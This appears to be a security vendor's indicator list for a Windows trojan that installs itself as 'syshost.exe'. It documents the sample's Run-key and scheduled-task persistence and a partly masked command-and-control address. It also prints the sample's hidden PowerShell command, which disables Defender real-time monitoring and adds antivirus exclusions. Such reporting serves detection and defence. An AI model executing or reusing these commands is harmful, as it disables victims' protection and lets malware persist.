Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'SysHelper' = '<Full path to file>'
- %APPDATA%\microsoft\windows\start menu\programs\startup\syshost.exe
- <SYSTEM32>\tasks\syshost
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "for($i=0;$i -lt 3;$i++){ try { Set-MpPreference -DisableRealtimeMonitoring $true -EA 0; Add-MpPreference -ExclusionPath $env:USERPROFILE -EA 0; Add-MpPr...
- ofbal.exe process, Amsi.dll module
- ofbal.exe process, ntdll.dll module
- %APPDATA%\microsoft\windows\syshost.exe
- '85.##0.107.59':8443
- '85.##0.107.59':8443
- '<SYSTEM32>\schtasks.exe' /create /tn "SysHost" /tr "\"%APPDATA%\Microsoft\Windows\syshost.exe\"" /sc onlogon /rl highest /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "for($i=0;$i -lt 3;$i++){ try { Set-MpPreference -DisableRealtimeMonitoring $true -EA 0; Add-MpPreference -ExclusionPath $env:USERPROFILE -EA 0; Add-MpPr...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /tn "SysHost" /tr "\"%APPDATA%\Microsoft\Windows\syshost.exe\"" /sc onlogon /rl highest /f' (with hidden window)